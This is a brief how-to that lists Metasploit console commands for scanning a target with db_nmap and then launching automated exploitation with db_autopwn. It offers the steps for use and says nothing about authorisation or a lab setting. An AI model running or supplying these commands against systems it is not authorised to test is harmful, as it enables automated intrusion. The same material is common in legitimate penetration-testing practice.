HowTo: Metasploit Autopwn Quick Guide
- Run metasploit:
$ ./msfconsole
- Create the database which metasploit uses to store the nmap data:
> db_driver sqlite3
> db connect
- NMap the target, and place the results into the database.
> db_nmap target
you may have to:
> db_nmap -Pn target
- Run Autopwn:
> db_autopwn -t -p -e -s -b